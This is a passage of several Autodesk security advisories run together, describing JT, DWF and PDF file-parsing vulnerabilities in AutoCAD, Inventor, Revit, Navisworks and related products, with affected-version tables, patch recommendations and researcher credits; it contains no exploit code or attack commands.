_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk strongly recommends users of the 2019, 2020, 2021, 2022 and 2023 versions of Autodesk® Advance Steel, Autodesk® Civil 3D®, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD® or AutoCAD LT 2022 updates, as applicable, via the Autodesk Desktop App or the Accounts Portal. An update is not available for 32bit AutoCAD 2019. Customers using this version should plan to upgrade to 64bit AutoCAD 2019 or a newer AutoCAD version as soon as possible to avoid downtime and potential security vulnerabilities.

In addition, users of Autodesk® Navisworks ® should install the latest 2022 Update 2, which is available via the Autodesk Desktop App or Accounts Portal. This version of Autodesk® Navisworks® includes security updates that address the DWF, and DWFX file vulnerabilities. As a general best practice, we also recommend that customers only open DWF, or DWFX files from trusted sources.

Customers using previous versions that no longer qualify for full support should plan to upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative for reporting CVE-2022-25789, CVE-2022-25790, CVE-2022-25791, CVE-2022-25792, CVE-2022-25796, CVE-2022-27528
*   Anonymous working with Trend Micro Zero Day Initiative for reporting CVE-2022-25789
*   Tran Van Khang - khangkito (VinCSS) working with Trend Micro Zero Day Initiative for reporting CVE-2022-27868

**Related Information**

More information on related security advisories can be found on the Autodesk Trust Center.

**Revision History**

**Revision**

**Date**

**Description**

1.0

2/28/2022

Initial Release of the Security Advisory

1.1

3/31/2022

Update of the Security Advisory for Addition to Navisworks and AutoCAD supported versions in Product Table

1.2

4/25/2022 

Update of the Security Advisory for Addition to AutoCAD 2023 supported versions in Product Table and CVE-2022-27868 description

1.3

4/28/2022 

Update of the Security Advisory for Addition to Navisworks 2020 supported version in Product Table

1.4

5/25/2022 

Update of the Security Advisory for Addition to Navisworks 2019 supported version in Product Table

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

CVE-2022-27868: Security Advisories | Autodesk Trust Center

A maliciously crafted JT file in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Summary**

Applications and Services that utilize certain Autodesk products may be affected by Out-of-bounds Read, Out-of-bounds Write, and Information disclosure vulnerabilities. Exploitation of these vulnerabilities in conjunction with other vulnerabilities may lead to code execution in the context of the current process. 

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2021-40158 - A maliciously crafted JT file in Autodesk Inventor 2022, 2021, 2020, 2019 and AutoCAD 2022 may be forced to read beyond allocated boundaries when parsing the JT file. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.

2) CVE-2021-40159 - An Information Disclosure vulnerability for JT files in Autodesk Inventor 2022, 2021, 2020, 2019 in conjunction with other vulnerabilities may lead to code execution through maliciously crafted JT files in the context of the current process.

3) CVE-2022-25788 - A maliciously crafted JT file in Autodesk AutoCAD 2023 and 2022 may be used to write beyond the allocated buffer while parsing JT files. This vulnerability can be exploited to execute arbitrary code.

4) CVE-2022-27867 - A maliciously crafted JT file in Autodesk AutoCAD 2022, 2021, 2020, 2019 can be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions**

**Update Source**

Autodesk® Inventor

2022, 2021, 2020, 2019

2022.2

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Architecture

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Electrical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Map 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Mechanical

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® MEP

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® Plant 3D

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® AutoCAD® LT

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D®

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2023, 2022, 2021, 2020, 2019

2023.0.1, 2022.1.2\*\*

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change_

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk highly recommends that customers download and install the latest version of Autodesk® Inventor 2022 Update 2 (version 2022.2), which is available via the Autodesk Desktop App or the Accounts Portal. This version of Autodesk Inventor includes security updates that address the JT file vulnerabilities. As a general best practice, we recommend that customers only open JT files from trusted sources and update to the latest software version.

Updates are not available for previously supported versions of Autodesk® Inventor and AutoCAD® – versions 2021-2019. Mitigation instructions for Autodesk® Inventor 2021-2019 are available in this Autodesk Knowledge Network article and for Autodesk AutoCAD-based products in this Autodesk Knowledge Network article. In addition, users of the 2019, 2020, 2021, 2022 and 2023 versions of Autodesk® Advance Steel, Autodesk® Civil 3D, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD® or AutoCAD LT 2022 or 2023 updates, as applicable, via the Autodesk Desktop App or Accounts Portal.  

Customers using previous versions that no longer qualify for full support should plan to upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following researchers for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   xina1i working with HackerOne for reporting CVE-2021-40158 and CVE-2021-40159.
*   Mat Powell of Trend Micro Zero Day Initiative for reporting CVE-2021-40158, CVE-2021-40159, CVE-2022-25788, and CVE-2022-27867.
*   Tran Van Khang - khangkito (VinCSS) working with Trend Micro Zero Day Initiative for reporting CVE-2021-40158. 

**Revision History**

**Revision**

**Date**

**Description**

1.0

1/12/2022

Initial Release of the security advisory

1.1

2/28/2022

Updated Security Advisory

1.2

3/28/2022

Updated Security Advisory for all supported versions

1.3

4/25/2022

Update of the Security Advisory for Addition to AutoCAD 2023 supported versions in Product Table

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._ 

_© 2022, Autodesk, Inc._

CVE-2022-27867: Security Advisories | Autodesk Trust Center

Autodesk AutoCAD product suite, Revit, Design Review and Navisworks releases using PDFTron prior to 9.1.17 version may be used to write beyond the allocated buffer while parsing PDF files. This vulnerability may be exploited to execute arbitrary code.

**Summary**

Applications and Services that utilize versions of PDFTron prior to 9.1.17 may be impacted by Heap-based Buffer Overflow, and Untrusted Pointer Dereference vulnerabilities.

**Description**

The details of the vulnerabilities are as follows:

1) CVE-2022-27871: Autodesk AutoCAD product suite, Revit, Design Review and Navisworks releases using PDFTron prior to 9.1.17 version may be used to write beyond the allocated buffer while parsing PDF files. This vulnerability may be exploited to execute arbitrary code.

2) CVE-2022-27872 : A maliciously crafted PDF file may be used to dereference a pointer for read or write operation while parsing PDF files in Autodesk Navisworks 2022. The vulnerability exists because the application fails to handle a crafted PDF file, which causes an unhandled exception. An attacker can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code.

**Affected Products**

**Item**

**Impacted Versions**

**Mitigated Versions\***

**Update Source**

Revit®

2022, 2021, 2020 

2022.1.2, 2021.1.6, 2020.2.8

Autodesk Desktop App, or Accounts Portal

Navisworks®

2022, 2020, 2019

2022.2, 2020.5, 2019.7

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD®

2022, 2021, 2020,2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Architecture

2022, 2021, 2020,2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Electrical

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Map 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Mechanical

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® MEP

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Plant 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® LT

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4

Autodesk Desktop App, or Accounts Portal

Autodesk® Advance Steel

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

Autodesk® Civil 3D

2022, 2021, 2020, 2019

2022.1.2, 2021.1.2, 2020.1.5, 2019.1.4\*\*

Autodesk Desktop App, or Accounts Portal

AutoCAD® Mac

2022

2022.2.2

Autodesk Knowledge Network

AutoCAD® LT for Mac

2022

2022.2.2

Autodesk Knowledge Network

Autodesk ® Design Review

2018

2018 Hotfix 6

Autodesk Knowledge Network

Autodesk® 3ds Max®

2022, 2021

2022.3.3, 2021.3.8

Autodesk Desktop App, or Accounts Portal

_\*Note: Product list table contents subject to change._

_\*\* Note: Users of Autodesk Advance Steel, Autodesk Civil 3D, and the specialized toolsets of AutoCAD need to install either the AutoCAD product update(s) listed above or a more recent product version. These security fixes are not included in the updates specific to individual toolsets._

**Recommendations**

Autodesk strongly recommends that users of the affected products listed above apply the available hotfix for their version via the Autodesk Desktop App or the Accounts Portal. As a general best practice, we also recommend that customers only open PDF files from trusted sources.

In addition, users of the 2019, 2020, 2021 and 2022 versions of Autodesk® Advance Steel, Autodesk® Civil 3D®, AutoCAD®, AutoCAD® LT, and AutoCAD-based specialized toolsets listed in the table above should install the latest AutoCAD®, AutoCAD LT 2022 Updates via the Autodesk Desktop App or Accounts Portal. An update is not available for 32bit AutoCAD 2019. Customers using this version should plan to upgrade to 64bit AutoCAD 2019 or a newer AutoCAD version as soon as possible to avoid downtime and potential security vulnerabilities.

Users of Autodesk® Navisworks ® should install the latest 2022 Update 2, which is available via the Autodesk Desktop App or Accounts Portal. This version of Autodesk ® Navisworks ® includes security updates that address the PDF file vulnerabilities. As a general best practice, we also recommend that customers only open PDF files from trusted sources.

Customers using previous versions that no longer qualify for full support should upgrade to a supported version as soon as possible to avoid downtime and potential security vulnerabilities. Visit the Autodesk Knowledge Network for more information about previous version support.

**Acknowledgements**

We would like to thank the following researchers for reporting the relevant issues and for working with Autodesk to help protect our customers:

*   Anonymous working with Trend Micro Zero Day Initiative for reporting CVE-2022-27871 and CVE-2022-27872

**Related Information**

More information on related security advisories can be found on the Autodesk Trust Center.

**Revision History**

**Revision**

**Date**

**Description**

1.0

5/25/2022

Initial Release of Security advisory

_Disclaimer_

_INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS” IN CONNECTION WITH AUTODESK® PRODUCTS. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS AND ITS AND THEIR DIRECTORS, OFFICERS, EMPLOYEES, AGENTS AND REPRESENTATIVES MAKE NO REPRESENTATIONS ABOUT THE SITE, ANY PRODUCTS AND SERVICES CONTAINED ON THE SITE OR THE SUITABILITY OF THE INFORMATION CONTAINED IN THE MATERIALS, INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS PUBLISHED ON THIS SITE FOR ANY PURPOSE. THE SITE, ANY PRODUCTS OR SERVICES (INCLUDING WITHOUT LIMITATION, THIRD PARTY PRODUCTS AND SERVICES) OBTAINED THROUGH THE SITE, AND ALL SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS ARE PROVIDED FOR YOUR USE AT YOUR OWN RISK AND "AS IS" WITHOUT WARRANTY OF ANY KIND. AUTODESK AND/OR ITS RESPECTIVE SUBSIDIARIES, AFFILIATES, SUPPLIERS AND LICENSORS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS SITE, SUCH PRODUCTS AND SERVICES AND SUCH INFORMATION, CONTENT, DOCUMENTS, AND RELATED GRAPHICS, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NON-INFRINGEMENT._

_© 2022, Autodesk, Inc._

Tag

#zero_day